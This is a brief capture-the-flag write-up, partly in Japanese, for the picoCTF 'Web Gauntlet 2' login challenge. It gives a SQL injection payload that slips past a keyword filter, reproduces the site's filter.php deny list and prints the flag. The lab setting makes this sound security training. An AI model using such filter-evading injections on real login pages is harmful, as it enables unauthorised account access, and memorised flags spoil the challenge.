Web Gauntlet 2
AUTHOR: MADSTACKS
If the flag is not displayed after completing this challenge, try clearing your cookies. Cookies set by other challenges may prevent the flag from displaying properly.
Description
This website looks familiar... Log in as admin Site:
問題のヒントから見てSQliteらしい
ここの情報から見てSQLiを試してみる。
35文字の制約があるので、コマンドも少ない文字数で入力しなければならない。
Username: ad'||'min' group by
Password: '
//mercury.picoctf.net:61434/filter.php
<?php
session_start();
if (!isset($_SESSION["winner2"])) {
$_SESSION["winner2"] = 0;
}
$win = $_SESSION["winner2"];
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
if ($win === 0) {
$filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
if ($view) {
echo "Filters: ".implode(" ", $filter)."<br/>";
}
} else if ($win === 1) {
if ($view) {
highlight_file("filter.php");
}
$_SESSION["winner2"] = 0; // <- Don't refresh!
} else {
$_SESSION["winner2"] = 0;
}
// picoCTF{0n3_m0r3_t1m3_b55c7a5682db6cb0192b28772d4f4131}
?>
picoCTF{0n3_m0r3_t1m3_b55c7a5682db6cb0192b28772d4f4131}